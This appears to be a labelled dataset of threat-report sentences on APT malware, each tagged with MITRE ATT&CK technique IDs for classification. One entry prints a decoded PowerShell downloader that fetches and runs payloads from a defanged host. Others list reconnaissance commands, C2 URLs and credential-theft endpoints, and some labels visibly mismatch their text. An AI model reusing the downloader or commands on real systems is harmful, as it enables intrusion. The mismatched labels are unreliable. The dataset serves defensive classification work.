{"text1":"These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u00a0\u2190 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u00a0\u2190 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002']"}
{"text1":"The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system","labels":"['T1518.001', 'T1497']"}
{"text1":"The server-side component provides a simple graphical user interface for threat actors interacting with web shells","labels":"['T1059', 'T1505.003']"}
{"text1":"These vulnerabilities include:CVE-2015-6585: Hangul Word Processor VulnerabilityCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x VulnerabilityCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 VulnerabilityCVE-2016-1019: Adobe Flash Player 21.0.0.197 VulnerabilityCVE-2016-4117: Adobe Flash Player 21.0.0.226 VulnerabilityDHS recommends that organizations upgrade these applications to the latest version and patch level","labels":"['T1068', 'T1203']"}
{"text1":"The SHA256 hash is then base64 encoded, which results in an encoded string of EfZrVfPSQwNiHl75VlsCpXbMWLxfh4nK6Ww9QABkuQ4=, of which the first 24 characters are used as the 3DES key","labels":"['T1027', 'T1132']"}
{"text1":"The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL: http:\/\/www7.chrome-up[.]date\/0m5EE We were not able to retrieve the shellcode hosted at this URL","labels":"['T1071', 'T1064', 'T1059.001']"}
{"text1":"The source code only considers the following machine types:default:   lpString = \"(Other)\";               break;case 0x02: lpString = \"(Unknown)\";             break;case 0x03: lpString = \"(Desktop)\";             break;case 0x04: lpString = \"(Low Profile Desktop)\"; break;case 0x06: lpString = \"(Mini Tower)\";          break;case 0x07: lpString = \"(Tower)\";               break;case 0x08: lpString = \"(Portable)\";            break;case 0x09: lpString = \"(Laptop)\";              break;case 0x0A: lpString = \"(Notebook)\";            break;case 0x0E: lpString = \"(Sub Notebook)\";        break;The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"Golden Time\" campaign.Brower StealerFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer","labels":"['T1008', 'T1124']"}
{"text1":"The started command will send the following information to the C&C:  device_model: the model identifier (e.g.: MacBookPro9,2) bot_version: version of Keydnap build_name: the \u201cbuild name\u201d that was given by downloader os_version: OS X or macOS kernel version ip_address: external IP address as reported by ipify.org has_root: 1 if executed as root, 0 otherwise  Backdoor commands The response to get_task contains an integer to identify the type of command and optional arguments","labels":"['T1082', 'T1016']"}
{"text1":"The string \u201cfjzmpcjvqp\u201d is unique and not something likely to be present if the code was not generated with the same public POC exploit code","labels":"['T1140', 'T1027.001']"}
{"text1":"The switch statement checks for 19 cases, between 101 and 119.\u00a0(Updated to correct command IDs, thanks @mykill!)    Command ID Function  \u00a0Description   101 getInfoOSX Gathers username and OSX version and responds using the encrypted form of the following string: \u201cMac OS X \u2013 [OSX version] x64<br>\\nUser name \u2013 [username]\u201d   102 getProcessList Runs \u201cps aux\u201d to obtain a list of running processes   103 remoteShell Runs supplied command using \u201c\/bin\/sh\u201d   104 getInstalledAPP Gets a list of installed applications by running the command \u201cls -la \/Applications\u201d   105 showBackupIosFolder Checks to see if an IOS device was backed up to the system by running the command \u201cls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\u201d   106 downloadFileFromPath Uploads a file from a specified path   107 createFileInSystem Downloads a file, specifically provided within the C2 server\u2019s HTTP response   108 execFile Executes a specified file on the system using the NSTask:launch method   109 deletFileFromPath Deletes a specified file using the NSFileManager:removeFileAtPath method   110 takeScreenShot Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods","labels":"['T1070.006', 'T1071', 'T1106']"}
{"text1":"The threat actor\u2019s main objective for using this RAT (known as Razy\/NeD worm\/Wonder Botnet) was obvious from the victim data that was collected \u2013 it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID \u2013 long MD5 string), encrypted and uploaded to the C2","labels":"['T1005', 'T1083', 'T1074']"}
{"text1":"The tool runs the following list of WMI queries:  wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace wmic diskdrive get Model, SerialNumber wmic computersystem get Manufacturer, Model, Name, SystemTypec wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages wmic process get Caption,ExecutablePath  The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp:\/\/145.249.105[.]165\/resource-store\/stockroom-center-service\/check.php?fm=[serial number] The C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows: spp=[system information from WMI queries] &spvg=[screenshot in JPEG format] Conclusion The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques","labels":"['T1047', 'T1057', 'T1041']"}
{"text1":"The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <file identifier> + \u201c?supportTeamDrives=true&fields=modifiedTime\u201d The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \\\u201dmodifiedTime\\\u201d:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded","labels":"['T1070.006', 'T1074', 'T1547.009', 'T1105']"}
{"text1":"The Trojan compares the TimeZone.CurrentTimeZone.DaylightName property to strings Iran, Arab, Arabia and Middle East, which will match the following time zones in Windows: \u00a0 Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) According to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as seen in Figure 3","labels":"['T1070.006', 'T1124']"}
{"text1":"The Trojan downloads the contents of this file by crafting an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <first file identifier> + \u201c?alt=media\u201d With the contents of the file downloaded, the Trojan sets the modification_time variable to the current modification time so the Trojan knows when the actor makes further changes to the file","labels":"['T1070.006', 'T1083', 'T1105']"}
{"text1":"The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \u201copen\u201d function using the ShellExecuteW API function","labels":"['T1106', 'T1140']"}
{"text1":"The URL used can be found in the embedded OLE object:hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_calcel.php?fdid=[base64_data]Here is the source code of the downloaded HTA document:<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd\"><html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"><head><meta content=\"text\/html; charset=utf-8\" http-equiv=\"Content-Type\" \/><title>Bonjour<\/title><script language=\"VBScript\">Set owFrClN0giJ = CreateObject(\"Wscript.Shell\")Set v1ymUkaljYF = CreateObject(\"Scripting.FileSystemObject\")If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") ThenowFrClN0giJ.Run \"powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQBvA[...redacted...]H0AIAA=\" ,0owFrClN0giJ.Run \"cmd \/c echo hta>%tmp%\\webbrowser1094826604.tmp\", 0End IfSelf.Close<\/script><hta:applicationid=\"oHTA\"applicationname=\"Bonjour\"application=\"yes\"><\/head><\/html>Once decoded using the base64 algorithm, we are able to read the final payload:$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+\"\\\\alitmp0131.jpg\"$t2=$t+\"\\\\alitmp0132.jpg\"$t3=$t+\"\\\\alitmp0133.js\"try  {    echo $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/appach01.jpg\",$t1)    $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/appach02.jpg\",$t2)    $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_ok.ipp\",$t3)    wscript.exe $t3  }catch  {   }The purpose of this script is to download and execute a Windows script and two encoded payloads","labels":"['T1071', 'T1064']"}
{"text1":"The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\ v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory","labels":"['T1036', 'T1074', 'T1064']"}
{"text1":"The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp:\/\/109.248.148[.]42\/agr-enum\/progress-inform\/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand \u201c&\u201d): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing","labels":"['T1082', 'T1057', 'T1132']"}
{"text1":"The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance","labels":"['T1036', 'T1102']"}
{"text1":"The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards","labels":"['T1070.004', 'T1064']"}
{"text1":"The x command treats the supplied data as a PowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1\/SystemDiskClean.ps1), effectively overwriting the initial PowerShell script with a secondary payload script","labels":"['T1064', 'T1059.001']"}
{"text1":"BE2 also uses start menu locations for persistence: UsersuserAppDataRoamingMicrosoftWindowsStart","labels":"['T1007', 'T1036', 'T1074']"}
{"text1":"The \u201cExcel\u201d command receives another stage of the PowerShell code, saves it in \u201cc:\\programdata\\a.ps1\u201d and then asks Excel to execute this PowerShell script via DDE","labels":"['T1059', 'T1059.001']"}
{"text1":"This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active","labels":"['T1033', 'T1087']"}
{"text1":"This decrypted data is written to the following location:  %TEMP%\\WUpdate.~tmp  This \u2018WUpdate.~tmp\u2019 file is then copied to a filename of \u2018Applet.cpl\u2019, which is placed in the previously identified file path","labels":"['T1140', 'T1074']"}
{"text1":"This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute","labels":"['T1053.005', 'T1036']"}
{"text1":"This file is written to the following file path:  % TEMP%\\Update.~tmp  After the file is written, it is then copied to a filename of \u2019winhelp.cpl\u2019 in the directory that was initially chosen","labels":"['T1070.006', 'T1036', 'T1074']"}
{"text1":"This has led it to do more, such as:  Communication with more C&C servers \u2013 up to 16 P2P communication between infected nodes MAC address check - PlugX runs if the MAC address of an infected host\u00a0coincides with configuration information in itself (If not specified in the configuration, PlugX runs on any host)","labels":"['T1082', 'T1016']"}
{"text1":"This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it","labels":"['T1598.002', 'T1087', 'T1204']"}
{"text1":"This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging","labels":"['T1056', 'T1105']"}
{"text1":"This is performed by checking if the following libraries are loaded on the victim machine.SbieDll.dll (sandboxie library)Dbghelp.dll (Microsoft debugging tools)Api_log.dll (threatAnalyzer \/ GFI SandBox)Dir_watch.dll (threatAnalyzer \/ GFI SandBox)We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).nop dword ptr [eax+eax+00h] is a 5 byte NOP","labels":"['T1574.001', 'T1574.002']"}
{"text1":"This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor\u2019s database","labels":"['T1070', 'T1124']"}
{"text1":"This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:  MD5      0beb957923df2c885d29a9c1743dd94b  accounts.serveftp.com  59.188.0.197   BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy","labels":"['T1071', 'T1016']"}
{"text1":"This plugin provides the attacker with the ability to both list files and download\/upload files on the victim machine","labels":"['T1083', 'T1105']"}
{"text1":"This shortcut file points to \u2018C:\\Windows\\system32\\rundll32.exe \u201c%APPDATA%\\cnagnt.dll\u201d,Sd\u2019    One of the exceptions to the installation routine above is in the event Symantec is detected","labels":"['T1218.011', 'T1547.009']"}
{"text1":"This task is executed every 25 minutes and will repeat the actions described above \u2013 recreating the JavaScript code which later will create and execute a PowerShell script (described below)","labels":"['T1064', 'T1059.001']"}
{"text1":"Thread Name   Description    Key logger  Logs key strokes for configured processes and sends them to the command and control (C2) server    Form grabber  Monitors HTTP traffic for form data and sends it to the C2 server    POS monitor  Monitors for changes to logs stored in C:\\NSB\\Coalition\\Logs and nsb.pos.client.log and sends parsed data to the C2 server    PST monitor  Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server    HTTP proxy monitor  Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use","labels":"['T1071', 'T1090', 'T1041', 'T1132', 'T1486']"}
{"text1":"Threat actor using appcmd to delete logs and disable logging","labels":"['T1562.001', 'T1070.004']"}
{"text1":"To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name \u00a0(ex","labels":"['T1053.005', 'T1036']"}
{"text1":"To install the payload, the script will create a file %APPDATA%\\OneDrive.bat and save the following string to it: powershell.exe -WindowStyle Hidden -exec bypass\u00a0 -File \u201c%APPDATA%\\OneDrive.ps1\u201d The script then writes a modified copy of itself to %APPDATA%\\OneDrive.ps1, with the code that performs this installation omitted","labels":"['T1036', 'T1064']"}
{"text1":"To set up persistence, the loader creates a folder named \u201cc:\\temp\u201d, sets its attributes to be a hidden and system folder to hide the folder from view in Windows Explorer","labels":"['T1547.001', 'T1564.001']"}
{"text1":"Tweets by second account @dookhtegan1 providing a Telegram channel with the leaked files Data Dump Contents The contents of the data dump includes various types of datasets that appear to be results from reconnaissance activity, initial compromises, and tools the OilRig operators use against target organizations","labels":"['T1003', 'T1041']"}
{"text1":"Unpacking routine for SWF exploit The exploit is a memory corruption vulnerability that exists in the \u201ccom.adobe.tvsdk.mediacore.BufferControlParameters\u201d class.\u00a0 If the exploit is successful, it will gain arbitrary read \/ write operations within memory, thus allowing it to execute a second stage shellcode","labels":"['T1068', 'T1203']"}
{"text1":"Upon execution, the \u201cWindows Folder.exe\u201d file copies itself to C:\\Users\\<username>\\AppData\\Roaming and creates a Windows shortcut (LNK) file in the victim\u2019s Startup directory as a persistence mechanism","labels":"['T1074', 'T1547.009']"}
{"text1":"Upon execution, this command extracted, decrypted, and executed the PowerShell backdoor payload stored in the HiveUploadTask text property of the RacTask class","labels":"['T1140', 'T1059.001']"}
{"text1":"Variable Name Description   gdu Google Drive URL for downloading files to the Google Drive account   gduu Google Drive URL for uploading files to the Google Drive account   gdue Google Drive URL for updating a file on the Google Drive account   gdo2t Google Drive URL used to get the OAUTH access_token   client_id The client_id for the OAUTH application   cs The client_secret for OAUTH   r_t The refresh_token for OAUTH    Table 6 Variables used to store settings needed to use Google Drive as a C2 To obtain an OAUTH access token to authenticate to the actor provided Google account, the Trojan sends an HTTP POST request to a URL stored in the gdo2t variable with grant_type, client_id, client_secret, and refresh_token fields added to the HTTP header and in the POST data","labels":"['T1102']"}
{"text1":"Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments","labels":"['T1598.003', 'T1189']"}
{"text1":"Watch on\u00a0Fox News: Hackers may use fake Netflix app to spy on\u00a0users As users have become more attached to their mobile devices, they want everything on those devices","labels":"['T1120', 'T1087']"}
{"text1":"We are still analyzing this Trojan to determine the specific structure of the data sent between the Trojan and the C2 server; however, it does appear that the Trojan is using the RC4 algorithm to encrypt data sent to the C2 server within HTTP POST requests","labels":"['T1573', 'T1041']"}
{"text1":"We are unsure of the shellcode hosted at this URL, but it is possible that additional shellcode-based payloads like Meterpreter could have been served by this shellcode","labels":"['T1064', 'T1105']"}
{"text1":"We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:  Append a string to the password that acts as a salt Obtain the SHA1 hash of the resulting string containing the password and salt Base64 encode the SHA1 hash Compare the encoded hash with hardcoded base64 string If the encoded hash matches hardcoded base64 string then the inbound request is authenticated Generates the SHA256 hash of the password string Base64 encodes the SHA256 hash and uses the first 24 characters as a key Uses 24-character key and the 3DES cipher to decrypt the embedded webshell  Now let\u2019s look at how this works with the values in the TwoFace++ loader sample","labels":"['T1573', 'T1140', 'T1027', 'T1550.002', 'T1132']"}
{"text1":"We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script","labels":"['T1562.001', 'T1027']"}
{"text1":"We have gathered three samples of the default loader associated with this group and extracted the following configurations:    SHA256 of Sample Configuration   82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019]   db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018www1.chrome-up[.]date:4443\u2019, \u2018-t\u2019, \u2018obfs3\u2019]   7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73 LAUNCHER_ARGS=[\u2018\u2013host\u2019, \u2018139.59.46[.]154:3543\u2019, \u2018-t\u2019, \u2018obfs3\u2019]    \u00a0 These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers","labels":"['T1016', 'T1102', 'T1008']"}
{"text1":"We have observed the following capabilities of this payload:  Get drive information Read files Write files Delete files Move files Spawn processes Create directories   Reaver TCP Payload The malicious CPL payload of Reaver has the following three exported functions:  ServiceMain CPlApplet DllEntryPoint  When the malware is initially loaded, DllEntryPoint will be called, which in turn will call a function that is responsible for decompressing a blob of data","labels":"['T1005', 'T1070.004', 'T1083']"}
{"text1":"We observed the threat group issue the following commands:  @echo off\u00a0  \u00a0dir c:\\ >> %temp%\\download\u00a0  \u00a0ipconfig \/all >> %temp%\\download\u00a0  \u00a0net user >> %temp%\\download\u00a0  \u00a0net user \/domain >> %temp%\\download\u00a0  \u00a0ver >> %temp%\\download\u00a0  \u00a0del %0\u00a0\u00a0  @echo off\u00a0  \u00a0dir \"c:\\Documents and Settings\" >> %temp%\\download\u00a0  \u00a0dir \"c:\\Program Files\\\u00a0  \u00a0\" >> %temp%\\download\u00a0  \u00a0net start >> %temp%\\download\u00a0  \u00a0net localgroup administrator >> %temp%\\download\u00a0  \u00a0netstat -ano >> %temp%\\download   These commands allow the threat group to gain information about the compromised computer and the network to which it belongs","labels":"['T1007', 'T1105', 'T1059.001']"}
{"text1":"We\u2019ve seen two onion addresses used in different samples:  g5wcesdfjzne7255.onion (Down) r2elajikcosf7zee.onion (Alive at time of writing)  The HTTP resource always starts with \/api\/osx\/ and contains actions such as:  \/api\/osx\/started to report the bot has just started \/api\/osx\/keychain to exfiltrate the content of the keychain \/api\/osx\/get_task?bot_id={botid}&version={version} to request a task (described below) \/api\/osx\/cmd_executed to report a the output of a command that was executed \/api\/osx\/task_complete?bot_id={botid}&task_id={taskid} to report a task was completed  HTTP POST content has two fields: bot_id and data","labels":"['T1071', 'T1106']"}
{"text1":"When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order","labels":"['T1071', 'T1008']"}
{"text1":"When comparing the provided timestamps of the delivery documents to the timestamps for the remote template documents from Table 2, we find that the time to attack is directly correlated to the last time the templates are modified","labels":"['T1070.006', 'T1124']"}
{"text1":"When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named \u201cvmtoolsd.\u201d Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name \u2018MSASCuiLTasks\u2019 in HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for persistence","labels":"['T1057', 'T1547.001']"}
{"text1":"When generating the URL for the HTTP requests issued to the C2 server, the Trojan chooses a random folder from the following to include within the URL path: watch\/? search\/? find\/? results\/? open\/? search\/? close\/? XAgent also will choose several parameters names from the following list when finishing the construction of the C2 URL: itwm= text= from=","labels":"['T1071', 'T1083']"}
{"text1":"When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2","labels":"['T1016', 'T1008']"}
{"text1":"When the actor modifies the file and changes the modification_time, the Trojan downloads the contents from the file by creating an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <file identifier in \u2018f_id\u2019> + \u201c?alt=media\u201d The Trojan processes the downloaded data within the file the same way it would to obtain a job from data received from the DNS tunneling channel using the TXT query mode, specifically by searching the data using the following regular expression: ([^r-v\\\\s]+)[r-v]([\\\\w\\\\d+\\\\\/=]+).(<domainList[0]>|<domainList[1]>|<domainList[n]>) The Trojan function splits the matching data, specifically the subdomain on a separator that is a character between r and v and uses the data before the separator to get the sequence number and a Boolean value (0 or 1) if more data is expected","labels":"['T1074', 'T1041', 'T1048', 'T1486']"}
{"text1":"While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger\/stealer","labels":"['T1518.001', 'T1018']"}
{"text1":"Year  Country  Industry  Malware  2014  Vietnam  Network Security  WINDSHIELD  2014  Germany  Manufacturing  WINDSHIELD  2015  Vietnam  Media  WINDSHIELD  2016  Philippines  Consumer products  KOMPROGO WINDSHIELD SOUNDBITE BEACON \u00a0 2016  Vietnam  Banking  WINDSHIELD  2016  Philippines  Technology Infrastructure  WINDSHIELD  2016  China  Hospitality  WINDSHIELD  2016  Vietnam  Media  WINDSHIELD  2016  United States  Consumer Products  WINDSHIELD PHOREAL BEACON SOUNDBITE  Table 1: APT32 Private Sector Targeting Identified by FireEye APT32 Interest in Political Influence and Foreign Governments In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013","labels":"['T1068']"}
{"text1":"\u0627\u0633\u062a\u0637\u0644\u0627\u0639.docx https:\/\/0utl00k[.]net\/docs    Table 1 Additional DarkHydrus Word documents used to steal credentials Both of these related documents use the attachedTemplate technique to steal credentials by sending them to a URL https:\/\/0utl00k[.]net\/docs","labels":"['T1003', 'T1552.001']"}